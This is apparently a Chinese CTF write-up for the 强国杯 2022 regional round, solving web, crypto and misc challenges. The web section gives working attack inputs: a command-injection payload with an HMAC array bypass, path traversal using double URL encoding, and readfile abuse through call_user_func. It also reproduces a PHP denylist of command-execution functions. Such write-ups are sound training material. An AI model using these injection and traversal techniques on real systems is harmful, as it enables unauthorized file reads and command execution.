强国杯 2022 分区赛 Writeup

4 min read

Web

Execute command

打开环境发现 It works! 外加 Apache 2.2.49 ,感觉是 CVE-2021-41773

image-20221009134137679

web_Huluwa

huluwa.mp3 中得到题目源码

image-20221009132527833

if(empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])){
    die('看我四娃喷火!看我五娃喷水!');
}

$secret = getenv("secret");

if(isset($_POST['yeye']))
    $secret = hash_hmac('sha256', $_POST['yeye'], $secret);

$qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);

if($qwer !== $_POST['Huluxiaojinggang']){
    die('看我大娃 正蹬,鞭腿,刺拳,训练有素。');
}

echo exec("nc".$_POST['Shejing']);

Shejing 最后和 nc 拼接当做命令执行,Huluxiaojinggang 必须和 Shejing 编码后的值一样, 而 yeye 我们直接 数组 绕过即可,直接根据代码逻辑生成 Huluxiaojinggang 的值

<?php
$a = "|cat flag.php";
var_dump(hash_hmac("sha256", $a, getenv("secret")));
// 342497a893ba4ea1b31fec268ee3a35539635831e08c2164327b328e26dbef44

yeye[]&Shejing=|cat flag.php&Huluxiaojinggang=342497a893ba4ea1b31fec268ee3a35539635831e08c2164327b328e26dbef44

ikun

访问环境,查看源码发现很明显是文件读取

image-20221009173439732

发现会在提交的内容后面拼接 .jpeg 后缀

image-20221009173843335经过测试发现可以使用 ? 进行截断绕过

image-20221009173533645

一番测试发现 flag 位置和名称

/file?image=../../../../../?

image-20221009173625003

尝试包含发现好像会过滤 flag 字符

image-20221009173646403

我们直接两次 url编码 绕过

/file?image=../../../../../%25%36%36%25%36%63%25%36%31%25%36%37%25%35%66%25%33%38%25%33%35%25%33%31%25%33%35%25%36%36%25%33%32%25%33%31%25%33%31%25%33%32%25%33%32%25%33%32%25%33%30?

image-20221009173710075

guomi

打开环境发现请求头里出现了提示,不之所以(被迷惑了一天,最后发现密码是 123123

Hint: select * from 'admin' where password=guomi($pass,true)

登录后跳转到了 guomi.php ,查看源代码发现 funcp

image-20221009172248393

随便构成传递一下,通过报错信息发现使用的 call_user_func

image-20221009172328426

一番操作发现所有的常见的命令执行函数全被禁用,后来想了一下,执行不行,读取应该可以,所以直接使用 readfile 成功读取到 guomi.phpp 的源码

/guomi.php?func=readfile&p=guomi.php

<?php
$disable_fun = array("file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        if (!in_array($p,$disable_fun)){
            echo gettime($func,$p);
        }else{
            die("you are Hacker....");
        }
        #echo gettime($func, $p);
    }else {
        die("you are Hacker...");
    }
}
?>

$disable_fun 正好写了 flag的位置,我们直接读取 flag

/guomi.php?func=readfile&p=/tmp/flagqlklg

Crypto

神秘的二进制

直接 2进制16进制 然后再转成 字符串 ,得到的字符串感觉像是 base64 但解密未果,最后发现是换表了

import base64

str1 = '1100110100010101010000001011110011001101010110010011000100101100110100010101100011001101011001011100010110100001110110010000010011010101010101001100110101001000110010010101010101100001010001011100010101011000110111010010000011010001000110001011110100011101110010010001100100001101010111001101110110101101111010010101000011001101010010011011010101100000110110011110000011011101000011001100100011000101010011'

str2 = bytes.fromhex(hex(int(str1, 2))[2:]).decode('utf-8')
# 3EP/3VLK4V3YqhvA5U3R2UXQqV7H4F/GrFCW7kzT3RmX6x7C21S

t = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
l = ""
for i in str2:
    l += t[(t.index(i)-30)%64]
if len(l)%4!=0:
    l = l+"="*(4-(len(l)%4))
print(base64.b64decode(l).decode('utf-8'))

# flag{lkvz04bofscnr3wijxh6y8teug29q7da}

Misc

好多图图

docx 后缀改为 zip,解压后在 word/theme 目录发现 1-30.png 在第 22 张中发现flag

image-20221009153946376

编码的乐趣

直接 与佛论禅 -> 社会主义核心价值观 -> md5

Listen to the audio

通过在线网站得到图片中隐藏的密码 Gnfjj@g94

image-20221009165421045

但是解密不对,根据提示说是 栅栏解密栏数为5 ,最后试出是 W型栅栏 ,得到最终密码 Gfjg49@jn,直接使用 MP3Stego 解密即可

.\Decode.exe -X .\1.mp3 -P 'Gfjg49@jn'
找到什么了?
.\Decode.exe -X .\2.mp3 -P 'Gfjg49@jn'
flag{atnmjkrobu840mghcnr3imtn4mf8rv8g}